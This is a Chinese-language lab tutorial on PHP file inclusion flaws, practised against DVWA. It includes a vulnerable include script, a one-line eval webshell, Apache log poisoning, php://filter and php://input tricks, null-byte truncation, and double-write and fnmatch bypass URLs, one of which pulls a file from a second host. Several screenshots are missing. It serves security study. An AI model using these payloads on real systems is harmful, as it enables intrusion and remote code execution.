文件上傳及文件包含

目錄

• 文件包含漏洞
  • 測試代碼
  • 遠程文件包含
  • 本地文件包含
    • 本地包含圖片馬實例
    • 本地包含繞過
      • 一、包含漏洞上傳技巧（一句話圖片馬等）
      • 二、包含日誌文件
  • CustomLog "logs/access.log" common
    • 三、PHP包含讀文件
    • 四、PHP包含寫文件（詳解以下）
    • 五、包含截斷繞過
    • 六、str_replace函數繞過（字符拼接）
    • 七、fnmatch函數繞過（經過內置協議）
    • PHP內置協議

文件包含漏洞

簡介：

包含操做，在大多數Web語言中都會提供的功能，但PHP對於包含文件所提供的功能太強大，太靈活，因此包含漏洞常常出如今PHP語言中，這也就致使了出現了一個錯誤現狀，不少初學者認爲包含漏洞只出現PHP語言之中，卻不知在其餘語言中可能出現包含漏洞。這也應了一句老話:功能越強大，漏洞就越多。

文件包含漏洞其自己就是一個嚴重的漏洞，其產生的緣由就是

程序員開發的時候，未對包含的文件進行嚴格過濾、未部署完善給的權限控制，致使攻擊者可構造本身的圖片木馬文件看成程序執行。

包含主要分爲本地和遠程；遠程須要必定的條件，且苛刻，本地相對容易一些。

測試代碼

<?php
 $filename = $_GET['filename']; 
include($filename); 
?>

保存爲：include.php

遠程文件包含

遠程包含優勢：不須要將木馬傳到對方服務器，不管木馬在任何地方只要在互聯網上服務器，都能包含到目標去。

遠程包含缺點：條件苛刻

但前提須要知足如下兩個條件：

• 魔術符號關閉
• allow_url_include開啓

舉例：[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-eX9E0rdm-1610795266333)(八、文件上傳及文件包含.assets/image-20210106103802542.png)]

本地文件包含

本地包含缺點：必須將腳本或者木馬傳到目標服務器的本地路徑下才能包含。

本地包含優勢：相對容易實現。

本地包含圖片馬實例

利用文件包含漏洞：

本地包含繞過

一、包含漏洞上傳技巧（一句話圖片馬等）

一句話馬：

<?php @eval($_POST["123"]);?>

直接鏈接：

是沒法利用的。

利用文件包含漏洞使用蟻劍鏈接：

是成功的，文件被執行。

二、包含日誌文件

當某個PHP文件存在本地包含漏洞，而卻沒法上傳正常文件，這就意味這有包含漏洞卻不能拿來利用，這時攻擊者就有可能會利用apache日誌文件來入侵。

Apache服務器運行後會生成兩個日誌文件，這兩個文件是access.log(訪問日誌)和error.log(錯誤日誌)，apache的日誌文件記錄下咱們的操做，而且寫到訪問日誌文件access.log之中

那麼思路就是當咱們對一個站點頁面提交一句話馬，找到其日誌文件，利用文件包含漏洞達成鏈接。（全部的實現均創建在理想的條件下思路，即咱們找到了日誌路徑、具備文件包含漏洞、是apache中間件，不是說百分百，也沒有人敢保證百分百。）

首先：

開啓通用日誌功能

點擊「其餘選項菜單-打開配置文件-httpd-conf」，打開httpd.conf配置文件，第299行

CustomLog "logs/access.log" common

去掉前邊的 # ，並重啓apache。

其次，訪問一個站點頁面，且提交一個一句話馬使其留在日誌中：

而後尋找一個具備文件包含漏洞的頁面進行文件包含日誌，在使用蟻劍鏈接。

http://192.168.18.62:86/DVWA/vulnerabilities/fi/?page=../../../../Apache/logs/access.log

三、PHP包含讀文件

http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php

訪問URL,獲得通過base64加密後的字符串，注意：convert.base64-encode

經解密還原獲得以下：

解碼獲得如下內容：

四、PHP包含寫文件（詳解以下）

注意這個想要達成須要知足下面的條件:

• 只有在allow _url_include爲on的時候纔可使用

• 同時若是想查看回顯結果那必須在C:\php\php-5.2.14-Win32下找到php.ini打開，查找disable_functions = eval,proc-open,oppen,exec,system…….刪掉system重啓apache。（eval加入的話一句話都連不上了，php中能執行命令的函數加入後，什麼都連不上）

  （默認是爲空的）

  注意安全加固中：查找display_funtions=寫入相關的命令，達到黑名單的臨時加固，真正想用白名單就得讓開發的重寫相關配置。

構造URL: http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=php://input,而且提交post數據爲:

五、包含截斷繞過

執行代碼：

<?php
	if(isset($_GET['page'])){
		include $_GET['page'] .".php" ;
	}else{
		include 'home.php';
	}
?>

//限制了頁面包含只能是.php結尾的文件，通常來講用戶是不可能上傳與中間件同類的文件，因此木馬通常都是其餘的後綴，那麼這裏就限制了包含的文件類型。

對上面代碼的這種繞過方法只適合於magic_quotes_gpc=off的時候， php版本小於5.3.4，與白名單繞過一致，可經過%00截斷繞過，不過如今已經很難見到了，好比：index.php?file=info.txt//////////////…………超過必定數據的/

實例：

六、str_replace函數繞過（字符拼接）

以DVWA的模板爲例medium，在代碼審計角度上，分析一下下面的代碼：

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

• 使用str_replace函數是極其不安全的，由於可使用雙寫繞過替換規則。

• 例如page=hthttp://tp://192.168.0.103/phpinfo.txt時，str_replace函數會將http://刪除"一次"，因而依然是page=http://192.168.0.103/phpinfo.txt，成功執行遠程命令。

• 同時，由於替換的只是「../」、「..\」，因此對採用絕對路徑的方式包含文件是不會受到任何限制的。

例如：

一、本地文件包含交替雙寫繞過（..././代替../）

http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=..././..././robots.txt

二、絕對路徑不受任何影響

http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs/dvwa/php.ini

三、遠程文件包含交替雙寫繞過

http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.18.23/pass.php

七、fnmatch函數繞過（經過內置協議）

以DVWA的模板爲例hight，在代碼審計角度上，分析一下下面的代碼：

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

if(!fnmatch("file*",$file)&&$file!="include.php")

這段代碼的意思就是當文件既不是"include.php"也不是"file"（文件名file開頭）時才拋出錯誤，
反之也就是說，若是文件名符合其中一個條件既能夠。http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=file:///C:/test.html 恰好知足"file"（文件名file開頭）。

說一下這個file://，在本地新建一個[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-GszbwUaD-1610795266395)(八、文件上傳及文件包含.assets/image-20210106173615792.png)]

而後瀏覽器打開，獲得如下的效果：

當咱們以知足要求，繞過fnmatch函數的方式構造了下面的語句：

http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=file:///C:/test.html

直接訪問便獲得告終果：

PHP內置協議

PHP帶有不少內置URL風格的封裝協議，可用於相似fopen()、copy()、file_exists()和filesize()的文件系統函數。

具體協議請參照http://www.php.net/manual/zh/wrappers.php

常見的一些：

File://	訪問本地文件系統
htt[p://	訪問HTTP(s)網址
ftp://	訪問FTP(s)URLS
php://	訪問各個輸入/輸出流(I/o streams)
zlib://	壓縮流
data://	數據(RFC2397)
ssh2://	Secure Shell 2
expect://	處理交互式的流
glob://	查找匹配的文件路徑模式